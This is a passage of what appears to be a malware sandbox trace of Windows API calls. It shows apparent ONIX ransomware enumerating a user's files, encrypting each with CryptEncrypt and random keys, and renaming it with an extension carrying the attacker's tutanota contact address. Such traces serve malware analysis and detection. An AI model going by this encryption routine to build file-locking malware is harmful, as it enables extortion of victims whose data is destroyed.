dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.406] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.408] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.409] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x51de) returned 0x4e1b68 [0129.410] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x51de) returned 0xf70048 [0129.411] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.411] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x51de, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x51de, lpOverlapped=0x0) returned 1 [0129.412] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x51de, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.412] CloseHandle (hObject=0x524) returned 1 [0129.413] GetProcessHeap () returned 0x410000 [0129.413] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.414] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uuuckmh46.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uuuckmh46.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.417] GetProcessHeap () returned 0x410000 [0129.417] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.417] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf0d83c10, ftCreationTime.dwHighDateTime=0x1d5e0f5, ftLastAccessTime.dwLowDateTime=0xb8f2c740, ftLastAccessTime.dwHighDateTime=0x1d5e058, ftLastWriteTime.dwLowDateTime=0xb8f2c740, ftLastWriteTime.dwHighDateTime=0x1d5e058, nFileSizeHigh=0x0, nFileSizeLow=0x6938, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Wuz6xxWpY8.m4a", cAlternateFileName="WUZ6XX~1.M4A")) returned 1 [0129.417] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wuz6xxwpy8.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.417] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.417] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6938, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.417] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.417] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.418] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.418] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.418] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.418] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.418] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a", dwFileAttributes=0x80) returned 1 [0129.420] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a") returned 61 [0129.420] GetProcessHeap () returned 0x410000 [0129.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xea) returned 0x431d68 [0129.420] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a" [0129.420] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.420] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=26936) returned 1 [0129.420] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x6938 [0129.420] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.420] GetProcessHeap () returned 0x410000 [0129.420] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.420] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.420] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.421] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.422] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.423] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6938) returned 0x4e1b68 [0129.423] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x6938) returned 0xf70048 [0129.424] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.424] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x6938, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x6938, lpOverlapped=0x0) returned 1 [0129.426] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6938, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.426] CloseHandle (hObject=0x524) returned 1 [0129.427] GetProcessHeap () returned 0x410000 [0129.427] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.427] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wuz6xxwpy8.m4a"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Wuz6xxWpY8.m4a.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wuz6xxwpy8.m4a.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.430] GetProcessHeap () returned 0x410000 [0129.430] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.430] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86cd7a20, ftCreationTime.dwHighDateTime=0x1d5dece, ftLastAccessTime.dwLowDateTime=0xaa28bd10, ftLastAccessTime.dwHighDateTime=0x1d5deae, ftLastWriteTime.dwLowDateTime=0xaa28bd10, ftLastWriteTime.dwHighDateTime=0x1d5deae, nFileSizeHigh=0x0, nFileSizeLow=0x41cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X3-8u92eeCqPDI.wav", cAlternateFileName="X3-8U9~1.WAV")) returned 1 [0129.430] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\x3-8u92eecqpdi.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.430] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.430] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x41cd, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.431] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.431] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.431] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.431] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.432] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.432] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.432] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav", dwFileAttributes=0x80) returned 1 [0129.432] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav") returned 65 [0129.432] GetProcessHeap () returned 0x410000 [0129.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf2) returned 0x431d68 [0129.432] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav" [0129.432] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.432] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=16845) returned 1 [0129.432] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x41cd [0129.432] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.432] GetProcessHeap () returned 0x410000 [0129.432] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.432] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.432] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.434] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.435] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x41cd) returned 0x4e1b68 [0129.436] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x41cd) returned 0x4e5d40 [0129.436] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.436] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x41cd, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x41cd, lpOverlapped=0x0) returned 1 [0129.438] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x41cd, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.438] CloseHandle (hObject=0x524) returned 1 [0129.438] GetProcessHeap () returned 0x410000 [0129.438] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.438] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\x3-8u92eecqpdi.wav"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\X3-8u92eeCqPDI.wav.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\x3-8u92eecqpdi.wav.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.440] GetProcessHeap () returned 0x410000 [0129.440] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.440] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf39ecc0, ftCreationTime.dwHighDateTime=0x1d5e377, ftLastAccessTime.dwLowDateTime=0x3c573720, ftLastAccessTime.dwHighDateTime=0x1d5d9be, ftLastWriteTime.dwLowDateTime=0x3c573720, ftLastWriteTime.dwHighDateTime=0x1d5d9be, nFileSizeHigh=0x0, nFileSizeLow=0x4b33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLb0W4iV_iDaVO.mkv", cAlternateFileName="XLB0W4~1.MKV")) returned 1 [0129.440] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xlb0w4iv_idavo.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.441] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.441] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x4b33, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.441] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.441] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.442] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.442] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.442] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.442] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.442] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv", dwFileAttributes=0x80) returned 1 [0129.442] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv") returned 65 [0129.442] GetProcessHeap () returned 0x410000 [0129.442] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf2) returned 0x431d68 [0129.442] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv" [0129.442] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.442] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=19251) returned 1 [0129.442] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x4b33 [0129.442] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.442] GetProcessHeap () returned 0x410000 [0129.442] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.442] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.442] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.444] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.445] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4b33) returned 0x4e1b68 [0129.446] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4b33) returned 0xf70048 [0129.447] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.447] ReadFile (in: hFile=0x524, lpBuffer=0x4e1b68, nNumberOfBytesToRead=0x4b33, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4e1b68*, lpNumberOfBytesRead=0x367f44c*=0x4b33, lpOverlapped=0x0) returned 1 [0129.450] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x4b33, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.450] CloseHandle (hObject=0x524) returned 1 [0129.451] GetProcessHeap () returned 0x410000 [0129.451] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.451] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xlb0w4iv_idavo.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\XLb0W4iV_iDaVO.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\xlb0w4iv_idavo.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.454] GetProcessHeap () returned 0x410000 [0129.455] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.455] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9d52d5f0, ftCreationTime.dwHighDateTime=0x1d5e01e, ftLastAccessTime.dwLowDateTime=0x8fe5cc0, ftLastAccessTime.dwHighDateTime=0x1d5e6be, ftLastWriteTime.dwLowDateTime=0x8fe5cc0, ftLastWriteTime.dwHighDateTime=0x1d5e6be, nFileSizeHigh=0x0, nFileSizeLow=0x1309, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y7vnPNPqShDG.odp", cAlternateFileName="Y7VNPN~1.ODP")) returned 1 [0129.455] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\y7vnpnpqshdg.odp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.455] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.455] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1309, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.455] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.455] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.456] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.456] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.456] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.456] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.456] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp", dwFileAttributes=0x80) returned 1 [0129.456] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\y7vnPNPqShDG.odp") returned 63 [0129.456] GetProcessHeap () returned 0x410000 [0129.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x431d68 [0129.456] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS 